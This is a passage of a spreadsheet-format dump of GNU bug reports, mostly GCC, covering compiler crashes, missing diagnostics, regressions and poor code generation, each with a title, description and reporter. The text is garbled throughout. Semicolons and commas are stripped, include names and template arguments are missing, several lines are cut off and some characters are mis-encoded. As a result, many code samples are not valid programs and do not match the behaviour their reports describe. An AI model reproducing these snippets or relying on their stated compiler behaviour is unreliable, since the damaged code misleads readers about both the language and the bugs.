                AN ASSIGNMENT STATEMENT AND PASSED ON AS AN ACTUAL
                SUBPROGRAM OR ENTRY 'IN OUT' OR 'OUT' PARAMETER AND AS 
                AN ACTUAL GENERIC 'IN OUT' PARAMETER AND THAT WHEN THE 
                VALUE OF THE RENAMED VARIABLE IS CHANGED THE NEW VALUE 
                IS REFLECTED BY THE VALUE OF THE NEW NAME.
   * C85006D INCORRECT VALUE OF XAI1( 1) (5).
   * C85006D INCORRECT VALUE OF XAI1( 2) (5).
   * C85006D INCORRECT VALUE OF XAI1( 3) (5).
...
.. CD92001 ACATS 2.5 06-02-16 05:55:05
---- CD92001 Check object attribute: X'Valid.
   * CD92001 Expected 'Valid =FALSE for Sparse item  1.
   * CD92001 Expected 'Valid =FALSE for Sparse item  2.
   * CD92001 Expected 'Valid =FALSE for Sparse item  3.
   * CD92001 Expected 'Valid =FALSE for Sparse item  4.
...</t>
  </si>
  <si>
    <t>GCC-69855</t>
  </si>
  <si>
    <t>Missing diagnostic for overload that only differs by return type</t>
  </si>
  <si>
    <t>The following code intended to create a local mutex but instead declared a function:
#include 
std::mutex
void f()
{
  std::lock_guard(get())
  // oops! mutex not locked
} 
But this should be invalid because get() is already declared in the enclosing scope and the return type is not the same. By failing to diagnose this error we allow the code above to compile and run without locking the mutex.
Reduced:
struct mutex { }
mutex
struct guard {
  guard(mutex&amp;) { }
}
void f()
{
  guard(get())
}
Clang says:
ww.cc:12:9: error: functions that differ only in their return type cannot be overloaded
  guard(get())
        ^
ww.cc:4:8: note: previous declaration is here
mutex
~~~~~~ ^
1 error generated.
EDG says:
ww.cc line 12: error: declaration is incompatible with previous get
          (declared at line 4)
    guard(get())
          ^
1 error detected in the compilation of ww.cc.</t>
  </si>
  <si>
    <t>GCC-15699</t>
  </si>
  <si>
    <t>[4.0 Regression] irix6.5 bootstrap ICE: abort in maybe_eval_c_test</t>
  </si>
  <si>
    <t>irix6.5 bootstrap fails as stage1 compiler ICEs
./genflags /disk4/billingd/src/gcc-j2/gcc/config/mips/mips.md &gt; tmp-flags.h
genflags: Internal error: abort in maybe_eval_c_test 
at /disk4/billingd/src/gcc-j2/gcc/gensupport.c:1127
./genconfig /disk4/billingd/src/gcc-j2/gcc/config/mips/mips.md &gt; tmp-config.h
genconfig: Internal error: abort in maybe_eval_c_test 
at /disk4/billingd/src/gcc-j2/gcc/gensupport.c:1127
./gencodes /disk4/billingd/src/gcc-j2/gcc/config/mips/mips.md &gt; tmp-codes.h
gencodes: Internal error: abort in maybe_eval_c_test 
at /disk4/billingd/src/gcc-j2/gcc/gensupport.c:1127
Problem introduced between 08:00 and 08:30 UTC on 27 May 2004
2004-05-25  Paolo Bonzini  
        * combine.c (gen_binary): Remove.
        (known_cond simplify_shift_const
        find_split_point combine_simplify_rtx
        simplify_if_then_else simplify_set
        simplify_logical expand_field_assignment
        extract_left_shift force_to_mode
        if_then_else_cond apply_distributive_law
        simplify_and_const_int simplify_shift_const
        gen_lowpart_for_combine simplify_comparison
        reversed_comparison): Replace with
        simplify_gen_binary simplify_gen_relational or
        distribute_and_simplify_rtx.
        (distribute_and_simplify_rtx): New function.
        * simplify-rtx.c (simplify_binary_operation):
        Use nonzero_bits to simplify ANDs where we are
        turning off bits already known to be off in OP0.</t>
  </si>
  <si>
    <t>billingd</t>
  </si>
  <si>
    <t>GCC-14793</t>
  </si>
  <si>
    <t>ice when using two namespaces (invalid code)</t>
  </si>
  <si>
    <t>the compiler crashes with this simple code:  
namespace teste{ 
int main( ){ 
	std::teste 
	return 0 
} 
} 
 filipezf@filipe:~/cpp/bug&gt; g++ -v o Teste Main.cpp 
g++: o: Arquivo ou diret?rio n?o encontrado 
g++: Teste: Arquivo ou diret?rio n?o encontrado 
Reading specs from /usr/lib/gcc-lib/i486-suse-linux/2.95.3/specs 
gcc version 2.95.3 20010315 (SuSE) 
 /usr/lib/gcc-lib/i486-suse-linux/2.95.3/cpp0 -lang-c++ -v -D__GNUC__=2 
-D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ 
-Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux 
-Asystem(posix) -D__EXCEPTIONS -Acpu(i386) -Amachine(i386) -Di386 -D__i386 
-D__i386__ -Di486 -D__i486 -D__i486__ Main.cpp /tmp/cciCGpMA.ii 
GNU CPP version 2.95.3 20010315 (SuSE) (i386 Linux/ELF) 
#include ... search starts here: 
#include  search starts here: 
 /usr/include/g++ 
 /usr/local/include 
 /usr/lib/gcc-lib/i486-suse-linux/2.95.3/include 
 /usr/include 
End of search list. 
The following default directories have been omitted from the search path: 
 /usr/lib/gcc-lib/i486-suse-linux/2.95.3/../../../../i486-suse-linux/include 
End of omitted list. 
 /usr/lib/gcc-lib/i486-suse-linux/2.95.3/cc1plus /tmp/cciCGpMA.ii -quiet 
-dumpbase Main.cc -version -o /tmp/ccc77bw1.s 
GNU C++ version 2.95.3 20010315 (SuSE) (i486-suse-linux) compiled by GNU C 
version 2.95.3 20010315 (SuSE). 
Main.cpp: In function `int teste::main()': 
Main.cpp:6: Internal compiler error. 
Main.cpp:6: Please submit a full bug report. 
Main.cpp:6: See  for 
instructions.</t>
  </si>
  <si>
    <t>filipezf</t>
  </si>
  <si>
    <t>GCC-41943</t>
  </si>
  <si>
    <t>include search path composition is bogus</t>
  </si>
  <si>
    <t>$prefix/include isn't searched!
$ /mingw/test/prefix/bin/gcc -v -E -o test.ii test.c
Using built-in specs.
COLLECT_GCC=C:\MinGW\test\prefix\bin\gcc.exe
COLLECT_LTO_WRAPPER=c:/mingw/test/prefix/bin/../libexec/gcc/i686-w64-mingw32/4.5.0/lto-wrapper.exe
Target: i686-w64-mingw32
Configured with: ../../../../../../src/gcc-4.5.0/configure --prefix=/mingw/test/prefix --with-sysroot=/mingw/test/sysroot --with-gmp=/mingw/test/prefix --with-mpfr=/mingw/test/prefix --with-mpc=/mingw/test/prefix --with-gnu-as --with-as=/mingw/test/prefix/bin/as.exe --with-gnu-ld --with-ld=/mingw/test/prefix/bin/ld.exe --enable-bootstrap --enable-threads=win32 --enable-languages=c --enable-checking=release --disable-werror --disable-multilib --build=i686-w64-mingw32
Thread model: win32
gcc version 4.5.0 20091027 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-v' '-E' '-o' 'test.ii' '-mtune=generic'
 c:/mingw/test/prefix/bin/../libexec/gcc/i686-w64-mingw32/4.5.0/cc1.exe -E -quiet -v -iprefix c:\mingw\test\prefix\bin\../lib/gcc/i686-w64-mingw32/4.5.0/ test.c -o test.ii -mtune=generic
ignoring nonexistent directory C:/MinGW/test/sysrootC:/MinGW/test/prefix/include
ignoring duplicate directory c:/mingw/test/prefix/lib/gcc/../../lib/gcc/i686-w64-mingw32/4.5.0/include
ignoring duplicate directory c:/mingw/test/prefix/lib/gcc/../../lib/gcc/i686-w64-mingw32/4.5.0/include-fixed
ignoring nonexistent directory c:/mingw/test/prefix/lib/gcc/../../i686-w64-mingw32/include
#include ... search starts here:
#include  search starts here:
 c:\mingw\test\prefix\bin\../lib/gcc/i686-w64-mingw32/4.5.0/include
 c:\mingw\test\prefix\bin\../lib/gcc/i686-w64-mingw32/4.5.0/include-fixed
 C:/MinGW/test/sysroot/mingw/include
End of search list.
COMPILER_PATH=c:/mingw/test/prefix/bin/../libexec/gcc/i686-w64-mingw32/4.5.0/c:/mingw/test/prefix/bin/../libexec/gcc/c:/mingw/test/prefix/bin/../lib/gcc/i686-w64-mingw32/4.5.0/../../../../i686-w64-mingw32/bin/
LIBRARY_PATH=c:/mingw/test/prefix/bin/../lib/gcc/i686-w64-mingw32/4.5.0/c:/mingw/test/prefix/bin/../lib/gcc/c:/mingw/test/prefix/bin/../lib/gcc/i686-w64-mingw32/4.5.0/../../../../lib32/c:/mingw/test/prefix/bin/../lib/gcc/i686-w64-mingw32/4.5.0/../../../../i686-w64-mingw32/lib/c:/mingw/test/prefix/bin/../lib/gcc/i686-w64-mingw32/4.5.0/../../../C:/MinGW/test/sysroot/mingw/lib/
COLLECT_GCC_OPTIONS='-v' '-E' '-o' 'test.ii' '-mtune=generic'
The interesting line is:
ignoring nonexistent directory C:/MinGW/test/sysrootC:/MinGW/test/prefix/include
Here the sysroot path is stitched together with $prefix/include which is clearly wrong!
Rainer</t>
  </si>
  <si>
    <t>ktietz</t>
  </si>
  <si>
    <t>GCC-17222</t>
  </si>
  <si>
    <t>libjava fails to build due to command line length during link</t>
  </si>
  <si>
    <t>Bootstrap fails during libjava on some targets
This is apparently due to the extremely long command line of 73379 characters
given to the linker.
Though it seems Automake should be able to handle this itself I would think
this could be circumvented by splitting the link into a several convenience
libraries and then linking those together.
Build output below</t>
  </si>
  <si>
    <t>GCC-1033</t>
  </si>
  <si>
    <t>ICE when a non-template class is declared as a template friend</t>
  </si>
  <si>
    <t>gcc reports an Internal Compiler Error when a normal (non-templetized) class is declared as a friend in another class. A very simple example reproduces the problem see below.
Release:
gcc 2.95.2
Environment:
SuSE Linux 7.0
How-To-Repeat:
Try to compile the file code:
class A { }
class B { template friend class A }
int main() { return 0 }</t>
  </si>
  <si>
    <t>biordanov</t>
  </si>
  <si>
    <t>GCC-61636</t>
  </si>
  <si>
    <t>generic lambda: segfault / cannot call member function without object</t>
  </si>
  <si>
    <t>In the following code:
Live http://coliru.stacked-crooked.com/a/b22bb3c9cd603bc7
#include 
#include 
template
auto if_else(std::true_typedatatype&amp;&amp; data FN1 &amp;&amp;fn1 FN2 &amp;&amp;) 
{return fn1(std::forward(data))}
template
auto if_else(std::false_typedatatype&amp;&amp; data FN1 &amp;&amp; FN2 &amp;&amp;fn2)
{return fn2(std::forward(data))}
// ---------------------------------------------------------------------
struct A{
    int id= 4
}
struct B : A{
    int h = 900
}
class Test{
template
int fn1(Ba &amp;a){
    std::cout &lt;&lt; fn1  &lt;&lt; a.h
    return a.h
}
template
int fn2(A &amp;a){
    std::cout &lt;&lt; fn2  &lt;&lt; a.id
    a.id = 9
    return a.id
}
public:
    template
    void go(){
        std::integral_constant do_first
        using datatype = typename std::conditional::type
        datatype data
        std::cout ::value
        std::cout &lt;&lt; if_else(do_first data
                    [&amp;](auto /*B&amp;*/ data){           // comment auto to get rid of error
                        std::cout &lt;&lt; std::endl
                        std::cout ::value
                        std::cout &lt;&lt; std::endl
                        return fn1(/*static_cast&lt;B // static cast not work with gcc
                    }
                    [ }
                )                
    }
}
int main(){
    Test().template go()
    Test().template go()
    return 0
}
I got the following error:
main.cpp:58:61: error: cannot call member function 'int Test::fn1(Ba&amp;) [with Ba = B]' without object
If change auto with B - works fine. And it compiles and work as is with clang.
P.S. Maybe somehow related to this https://gcc.gnu.org/bugzilla/show_bug.cgi?id=49554</t>
  </si>
  <si>
    <t>tower120</t>
  </si>
  <si>
    <t>CLASSPATH-35690</t>
  </si>
  <si>
    <t>javax.tools.FileObject.toUri is in wrong case</t>
  </si>
  <si>
    <t>According the the JavaDocs http://java.sun.com/javase/6/docs/api/javax/tools/FileObject.html toUri is in lowercase.  The classpath implementation is in uppercase toURI.</t>
  </si>
  <si>
    <t>gnu_andrew</t>
  </si>
  <si>
    <t>mvfranz</t>
  </si>
  <si>
    <t>GCC-48330</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: in optimize_inline_calls at tree-inline.c:4201 with -fmudflap -fno-early-inlining</t>
  </si>
  <si>
    <t>It seems any input file is enough to trigger the assertion.
Compiler output:
$ echo '' &gt; testcase.c
$ gcc -O -fmudflap -fno-early-inlining testcase.c 
testcase.c: In function '_GLOBAL__sub_I_00099_0_testcase.c':
testcase.c:1:0: internal compiler error: in optimize_inline_calls at tree-inline.c:4201
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
That assert was added in http://gcc.gnu.org/viewcvs?view=revision&amp;revision=171602</t>
  </si>
  <si>
    <t>GCC-44241</t>
  </si>
  <si>
    <t>vms-crtl.h vms-crtl-64.h need many more symbols</t>
  </si>
  <si>
    <t>There is a list of symbols in gcc to rename for VMS.
In the files vms-crtl.h and vms-crtl-64.h.
Maybe there is a better solution?
Until it is found and implemented these lists need a lot more entries.
I have enough to build gcc and binutils.
I had built cvs but I lost that list.</t>
  </si>
  <si>
    <t>gingold</t>
  </si>
  <si>
    <t>GCC-44980</t>
  </si>
  <si>
    <t>[4.6 Regression] Revision 162270 failed 450.soplex in SPEC CPU 2006</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 162270:
http://gcc.gnu.org/ml/gcc-cvs/2010-07/msg00624.html
caused:
  Running 450.soplex test base o3 default
450.soplex: copy 0 non-zero return code (exit code=0 signal=11)
Invalid run unable to continue.
I used -m32 -O3 -msse2 -mfpmath=sse -ffast-math -funroll-loops
to compile the benchmark.</t>
  </si>
  <si>
    <t>GCC-7827</t>
  </si>
  <si>
    <t>incorrect warning will never be executed when optimizing</t>
  </si>
  <si>
    <t>compiler issues incorrect warning about unreachable code (when
-O is supplied).  I don't know if it actually incorrectly deletes
code that it thinks is unreachable.
Release:
3.2.1 20020904 (prerelease)
Environment:
System: Linux speedy 2.4.18-5 #1 Mon Jun 10 15:31:48 EDT 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3_2-branch/configure --enable-languages=cc++ --prefix=/home/denys/src/GNU/GCC/install-3_2
How-To-Repeat:
Executing:
   c++ -O -Wunreachable-code -c foo.cc 
Prints:
   foo.cc: In function `bool foo(Node*)':
   foo.cc:11: warning: will never be executed</t>
  </si>
  <si>
    <t>duchier</t>
  </si>
  <si>
    <t>GCC-2721</t>
  </si>
  <si>
    <t>compile failure of Linux 2.4.4 kernel</t>
  </si>
  <si>
    <t>with i386 / Athlon / Duron switch enabled in linux configuration you get this
error while compiling: 
ake[2]: Entering directory `/usr/src/linux/kernel'
gcc -D__KERNEL__ -I/usr/src/linux/include -Wall -Wstrict-prototypes -O2
-fomit-frame-pointer -fno-strict-aliasing -pipe -mpreferred-stack-boundary=2
-march=athlon     -DEXPORT_SYMTAB -c sys.c
sys.c: In function `sys_gethostname':
/usr/src/linux/include/asm/rwsem.h:152: inconsistent operand constraints in an
`asm'
The error can be worked around by replacing first +d constrain by a =d and
adding a 0 constrain as input. 
However this can't be the right solution as there are other macros in the same
file that use _exactly_ the same constraints and only differ by the
initialisation of the long count and those are accepted. So I suspect it to be
a bug in gcc instead.
Release:
3.0 20010502 (prerelease)
Environment:
System: Linux rotes20 2.4.4 #4 Mon Apr 30 21:55:44 CEST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure --enable-shared --enable-threads --enable-languages=cc++</t>
  </si>
  <si>
    <t>dmuell</t>
  </si>
  <si>
    <t>GCC-79132</t>
  </si>
  <si>
    <t>False positive for -Walloc-size-larger-than= with -fsanitize=address aka. bootstrap-asan breakage</t>
  </si>
  <si>
    <t>Following code snippet block my bootstrap-asan:
struct A
template  struct B
{
  unsigned length ()
}
template  struct B
{
  unsigned
  length ()
  {
    return m_vec ? m_vec-&gt;length () : 0
  }
  B *m_vec
}
int rewrite_expr_tree_parallel_i
B ops
void
rewrite_expr_tree_parallel ()
{
  int *stmt
  int stmt_num = ops.length () - 1
  int **stmts = (int **) __builtin_alloca (stmt_num)
  stmts[1] = stmt
  rewrite_expr_tree_parallel_i = 2
  for ( rewrite_expr_tree_parallel_i rewrite_expr_tree_parallel_i--)
    for ( stmt_num rewrite_expr_tree_parallel_i++)
}
$ ./gcc/xgcc -B gcc -c -Walloc-size-larger-than=10000 tc.ii -O2 -fsanitize=address
tc.ii: In function â€˜void rewrite_expr_tree_parallel()â€™:
tc.ii:24:52: warning: argument 1 value â€˜18446744073709551615â€™ exceeds maximum object size 10000 [-Walloc-size-larger-than=]
   int **stmts = (int **) __builtin_alloca (stmt_num)
while
$ ./gcc/xgcc -B gcc -c -Walloc-size-larger-than=10000 tc.ii -O2
is fine.
It's cause by tc.ii.178t.thread3 where:
   [2.65%]:
  _19 = ops.m_vec
  if (_19 != 0B)
    goto  [53.47%]
  else
    goto  [46.53%]
   [1.42%]:
  _20 = B::length (_19)
  _42 = _20 + 4294967295
  _44 = (int) _42
  _45 = (long unsigned int) _44
   [2.66%]:
  # prephitmp_46 = PHI 
  # prephitmp_47 = PHI 
  stmts_13 = __builtin_alloca (prephitmp_46)
is transformed to:
   [2.65%]:
  _19 = ops.m_vec
  if (_19 != 0B)
    goto  [53.47%]
  else
    goto  [46.53%]
   [1.23%]:
  # prephitmp_26 = PHI 
  # prephitmp_30 = PHI 
  stmts_27 = __builtin_alloca (prephitmp_26)
Following patch fixes that:
diff --git a/gcc/tree-ssa-reassoc.c b/gcc/tree-ssa-reassoc.c
index 503edd3870d..4a796f48864 100644
--- a/gcc/tree-ssa-reassoc.c
+++ b/gcc/tree-ssa-reassoc.c
@@ -44076 +44077 @@ rewrite_expr_tree_parallel (gassign *stmt int width
 {
   enum tree_code opcode = gimple_assign_rhs_code (stmt)
   int op_num = ops.length ()
+  gcc_assert (op_num &gt; 0)
   int stmt_num = op_num - 1
   gimple **stmts = XALLOCAVEC (gimple * stmt_num)
   int op_index = op_num - 1
Thanks
Martin</t>
  </si>
  <si>
    <t>GCC-79523</t>
  </si>
  <si>
    <t>[7 Regression] valgrind error for gcc/testsuite/gfortran.dg/dtio_13.f90</t>
  </si>
  <si>
    <t>I just tried to compile the above test case with a valgrind version
of recent trunk gfortran. 
$ /home/dcb/gcc/results.245439/bin/gfortran -c   gfortran.dg/dtio_13.f90 
Ok the fortran produces error messages but also
==32156== Invalid read of size 1
==32156==    at 0x65E1FF: gfc_find_typebound_dtio_proc(gfc_symbol* bool bool) 
(interface.c:4832)
==32156==    by 0x65E29C: gfc_find_specific_dtio_proc(gfc_symbol* bool bool) (
interface.c:4878)
==32156==    by 0x6B8B0B: resolve_transfer (resolve.c:8962)
==32156==    by 0x6B8B0B: gfc_resolve_code(gfc_code* gfc_namespace*) (resolve.c
:11130)</t>
  </si>
  <si>
    <t>GCC-69769</t>
  </si>
  <si>
    <t>arithmetic operation on pointer to a function</t>
  </si>
  <si>
    <t>Hi
I would like to post a bug report for the GNU C/C++ compiler 6.0.0.
We use the compiler to generate code for a PowerPC processor.
Invokation line for the GNU C++ compiler:
ccppc -c -x c++ -std=gnu++14 -Wall -Werror -g -mcpu=e6500 -m32
      -maltivec=be -mvrsave -ftls-model=local-exec -msdata=sysv
      -fno-common -fno-openmp -mbig -mmultiple -mno-string -misel
      -mstrict-align -fverbose-asm -fno-exceptions -fno-rtti
      -ftemplate-backtrace-limit=20 -G 8 -O3
      -I
      -D
      X.CPP -oX.O
// file X.CPP
#include atomic
typedef void (T_FUNC) (int)
T_FUNC* getFunc (std::atomic&amp; refPtr)
{
    return refPtr.fetch_add(0 std::memory_order_relaxed)
}
The compiler accepts this programm despite of performing an arithmetic
operation on pointer to a function.
I think this is not standard conforming. The C++11 standard 29.6.5/28
describes the semantic of the atomic fetch functions:
Atomically replaces the value pointed to [...] by this with the result of
the computation applied to the value pointed to [...] by this and the given
operand. But applying an arithmetic operation on pointer to a function is
not a legal computation.
With kind regards
W. Roehrl</t>
  </si>
  <si>
    <t>wolfgang.roehrl</t>
  </si>
  <si>
    <t>GCC-52310</t>
  </si>
  <si>
    <t>Internal Compiler Error when building lesstif with -Wp-D_FORTIFY_SOURCE=2</t>
  </si>
  <si>
    <t>Created attachment 26701
Preprocessed source
[pterjan@jonund Xm-2.1]$ gcc -DHAVE_CONFIG_H -I. -I. -I../../include -I../../include/Motif-2.1 -I../../include/Motif-2.1 -I/usr/include -I/usr/include -O2 -g -pipe -Wformat -Werror=format-security -Wp-D_FORTIFY_SOURCE=2 -fstack-protector --param=ssp-buffer-size=4 -DMWM_DDIR=\/usr/share/X11/mwm\ -c XmString.c  -fPIC -DPIC -o .libs/XmString.o
{standard input}: Assembler messages:
{standard input}: Warning: end of file not at end of a line newline inserted
{standard input}:2041: Error: unbalanced parenthesis in operand 2.
{standard input}: Error: open CFI at the end of file missing .cfi_endproc directive
gcc: internal compiler error: Segmentation fault (program cc1)
I attached the preprocessed source it crashes here (x86_64) when using gcc -g -c XmStringE.c with gcc-4.6.2
This preprocessed source builds fine using gcc-4.5.1 (even if it gives a lot of warning about casting pointers to int).</t>
  </si>
  <si>
    <t>GCC-66781</t>
  </si>
  <si>
    <t>confused by earlier errors bailing out with wrong enum within class</t>
  </si>
  <si>
    <t>The following code makes the compiler crash with gcc5.1 and 60 at least.
Removing `public' still makes the compiler crash but leads to more error messages.
---------
class foo
{
    public:
    enum foo::bar{}
    foo::bar baz
}
---------</t>
  </si>
  <si>
    <t>deni_</t>
  </si>
  <si>
    <t>GCC-41788</t>
  </si>
  <si>
    <t>-Wpacked option changes the layout of packed non-POD structs</t>
  </si>
  <si>
    <t>When a packed non-POD struct is included in another packed struct
the outer struct layout changes depending on whether -Wpacked is used or not.
It seems wrong that a warning option affects data layout and code generation.
The same behavior is observed with 4.4.2 4.3.4 4.2.1 4.1.2.
It could be related to bug 26670.
% cat packed_nonpod.cpp
extern C int printf (__const char *__restrict __format ...)
struct INNER {
  virtual int foo() const { return 1 }
} __attribute__ ((packed))
struct OUTER {
  char c
  INNER inner
} __attribute__ ((packed))
int main()
{
  OUTER outer
  printf(sizeof(outer) = %u\n sizeof(outer))
  printf(offset(inner) = %u\n (char *)
  return 0
}
% g++ packed_nonpod.cpp
% a.out
sizeof(outer) = 5
offset(inner) = 1
% g++ packed_nonpod.cpp -Wpacked
packed_nonpod.cpp:3: warning: packed attribute is unnecessary for 'INNER'
packed_nonpod.cpp:9: warning: ignoring packed attribute because of unpacked non-POD field 'INNER OUTER::inner'
% a.out
sizeof(outer) = 8
offset(inner) = 4</t>
  </si>
  <si>
    <t>GCC-24616</t>
  </si>
  <si>
    <t>linking non-existing BC-compiled classes: NoClassDefFoundErrors should be deferred</t>
  </si>
  <si>
    <t>In various situations where the BC-compiled classes are linked and a NoClassDefFoundError is thrown this error condition should be deferred to the time when the actual erroneous code location is executed.
The situation always involves that a class cannot be resolved (because the bytecode is not available). That means:
- invoking a static method of a missing class
- accessing a static member of a missing class
- creating an array from a missing class
- creating a multi array from a missing class
- accessing a valid static member whose type is missing
- accessing a valid non-static field whose type is missing
- invoking a non-static method of a missing class (true?)
There may be more cases. I have to investigate that.</t>
  </si>
  <si>
    <t>GCC-25823</t>
  </si>
  <si>
    <t>--disable-hosted-libstdcxx causes build break</t>
  </si>
  <si>
    <t>While trying to build the libstdc++ library with --disable-hosted-libstdcxx specified in the configure step eh_alloc.cc fals to compile with an error that the line:
extern C int memset (void * int std::size_t)
declares memset different than it has already been declared.  Changing the line to
extern C void *memset (void * int std::size_t)
resolves the problem.</t>
  </si>
  <si>
    <t>pedz</t>
  </si>
  <si>
    <t>GCC-48530</t>
  </si>
  <si>
    <t>[C++0x][SFINAE] Hard errors with deleted d'tors</t>
  </si>
  <si>
    <t>The following program in C++0x mode is not well-formed but should be:
template&lt;class T
  class = decltype(T())
&gt;
char f(int)
template
char (
struct DelDtor {
  ~DelDtor() = delete
}
static_assert(sizeof(f(0)) != 1 Error)
error: use of deleted function â€˜DelDtor::~DelDtor()â€™
Note: This should be a case where the revised decltype rules in regard to complete types would not apply so it should be well-formed even after implementing this new rule.</t>
  </si>
  <si>
    <t>GCC-51379</t>
  </si>
  <si>
    <t>[C++0x] [DR 799] reinterpret_cast is not particularly useful</t>
  </si>
  <si>
    <t>The following code:
int main() {
    unsigned long t1 = 0
    unsigned long t2 = 1
    t1 = reinterpret_cast(t2)
    return 0
}
compiled using GCC 4.6.2 on Linux/x64:
g++ test.cpp
fails displaying:
test.cpp:5:44: error: invalid cast from type 'long unsigned int' to type 'long unsigned int'
IMHO this is a rather urgent issue.</t>
  </si>
  <si>
    <t>piotr.wyderski</t>
  </si>
  <si>
    <t>GCC-15679</t>
  </si>
  <si>
    <t>template ICE</t>
  </si>
  <si>
    <t>// Here is the simplified test case that leads to the ICE
// I do think it is legal code but perhaps I am wrong.
// My platform is :
//  SunOS Release 5.8 Version Generic_108528-20 [UNIX(R) System V Release 4.0] 
//  on a sparc SunBlade 2500
// The resulting line of compilation is:
// -----&gt;&gt;
// bug.cpp:6: internal compiler error: in grokdeclarator at cp/decl.c:10291
// Please submit a full bug report
// with preprocessed source if appropriate.
// See  for instructions.
// -----&lt;&lt;
struct foo1{
  template struct foo2{}
}
struct foo3 {
  typedef foo1::template foo2 foo2int
}</t>
  </si>
  <si>
    <t>df</t>
  </si>
  <si>
    <t>GCC-25016</t>
  </si>
  <si>
    <t>Integer overflow in _Jv_CondWait</t>
  </si>
  <si>
    <t>_Jv_CondWait makes no allowances for the possibility of an integer
overflow and this means we can return too early.
This causes very hard to track down bugs.  See https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=161483</t>
  </si>
  <si>
    <t>GCC-64134</t>
  </si>
  <si>
    <t>(vector float){0 0 b a} Uses stores when it does not need to</t>
  </si>
  <si>
    <t>Take the following code:
#define vector __attribute__((vector_size(16)))
float a float b
vector float fb(void) { return (vector float){ 00ba}}
--- CUT ---
This produces:
fb:
	adrp	x1 b
	adrp	x0 a
	ldr	w1 [x1 #:lo12:b]
	fmov	s0 wzr
	ldr	w0 [x0 #:lo12:a]
	sub	sp sp #16
	stp	s0 s0 [sp]
	str	w1 [sp 8]
	str	w0 [sp 12]
	ldr	q0 [sp]
	add	sp sp 16
	ret
This is really horrible and should be done as:
fb:
	adrp	x0 a
	adrp	x1 b
	movi	v0.4s 0
	ldr	s1 [x0 #:lo12:a]
	ldr	s2 [x1 #:lo12:b]
	ins	v0.s[3] v1.s[0]
	ins	v0.s[2] v2.s[0]
	ret</t>
  </si>
  <si>
    <t>alan.lawrence.arm</t>
  </si>
  <si>
    <t>GCC-54776</t>
  </si>
  <si>
    <t>[4.8 Regression] tramp3d-v4: 20% performance regression using -O3</t>
  </si>
  <si>
    <t>With gcc-4.8 (--enable-checking=release):
markus@x4 ~ % time c++ -w -O3 tramp3d-v4.cpp
c++ -w -O3 tramp3d-v4.cpp  24.87s user 0.34s system 99% cpu 25.293 total
markus@x4 ~ % ./a.out --cartvis 1.0 0.0 --rhomin 1e-8 -n 20
...
Time spent in iteration: 7.35642
With gcc-4.7.2:
markus@x4 ~ % time c++ -w -O3 tramp3d-v4.cpp
c++ -w -O3 tramp3d-v4.cpp  25.15s user 0.33s system 99% cpu 25.568 total
markus@x4 ~ % ./a.out --cartvis 1.0 0.0 --rhomin 1e-8 -n 20
...
Time spent in iteration: 5.81199
LTO doesn't help much (gcc-4.8):
markus@x4 ~ % time c++ -w -O3 -flto  tramp3d-v4.cpp
c++ -w -O3 -flto tramp3d-v4.cpp  45.78s user 0.95s system 99% cpu 47.012 total
markus@x4 ~ % ./a.out --cartvis 1.0 0.0 --rhomin 1e-8 -n 20
...
Time spent in iteration: 7.2111
(For comparison here are some clang results:
markus@x4 ~ % time clang++ -w -O3 tramp3d-v4.cpp
clang++ -w -O3 tramp3d-v4.cpp  14.67s user 0.12s system 99% cpu 14.874 total
markus@x4 ~ % ./a.out --cartvis 1.0 0.0 --rhomin 1e-8 -n 20
...
Time spent in iteration: 6.1923
markus@x4 ~ % time clang++ -w -O3 -flto tramp3d-v4.cpp
clang++ -w -O3 -flto tramp3d-v4.cpp  20.28s user 0.16s system 99% cpu 20.535 total
markus@x4 ~ % ./a.out --cartvis 1.0 0.0 --rhomin 1e-8 -n 20
...
Time spent in iteration: 4.47936
That's an almost 28% improvement due to -flto)</t>
  </si>
  <si>
    <t>GCC-79194</t>
  </si>
  <si>
    <t>[7 Regression] ICE in rtl_verify_bb_insns at cfgrtl.c:2661 (error: flow control insn inside a basic block)</t>
  </si>
  <si>
    <t>gcc-7.0.0-alpha20170122 snapshot ICEs when compiling the following snippet w/ -O3:
int iw vr
void
d9 (unsigned int j3 long long int f5 int kp)
{
  int *qb = 
  if (kp != 0)
    {
      long long int oq
      unsigned int tl = 0
      for (j3 = 0 j3 &lt; 1 ++j3)
        qb = 
      goto ed
 l7:
      oq = 1
      while (oq &lt; 2)
        oq *= j3
 ed:
      do
        {
          oq -= *qb
          if (oq != 0)
            {
              long long int ie = j3 
              int ws = (j3 != 0 
              tl = ie &gt; ws
              iw = vr = tl
            }
          else
            tl = (kp != 0 
        }
      while (tl != 0)
    }
  goto l7
}
% powerpc-e300c3-linux-gnu-gcc-7.0.0-alpha20170122 -O3 -w -c rrypxrpr.c
rrypxrpr.c: In function 'd9':
rrypxrpr.c:40:1: error: in basic block 47:
 }
 ^
rrypxrpr.c:40:1: error: flow control insn inside a basic block
(insn 508 347 353 47 (trap_if (const_int 1 [0x1])
        (const_int 0 [0])) 824 {trap}
     (nil))
rrypxrpr.c:40:1: internal compiler error: in rtl_verify_bb_insns at cfgrtl.c:2661
0x3177d0db745 _fatal_insn(char const* rtx_def const* char const* int char const*)
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170122/work/gcc-7-20170122/gcc/rtl-error.c:108
0x3177cc9d1e7 rtl_verify_bb_insns
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170122/work/gcc-7-20170122/gcc/cfgrtl.c:2661
0x3177cc9d1e7 rtl_verify_flow_info_1
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170122/work/gcc-7-20170122/gcc/cfgrtl.c:2747
0x3177cc8933d verify_flow_info()
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170122/work/gcc-7-20170122/gcc/cfghooks.c:258
0x3177cca26d7 checking_verify_flow_info
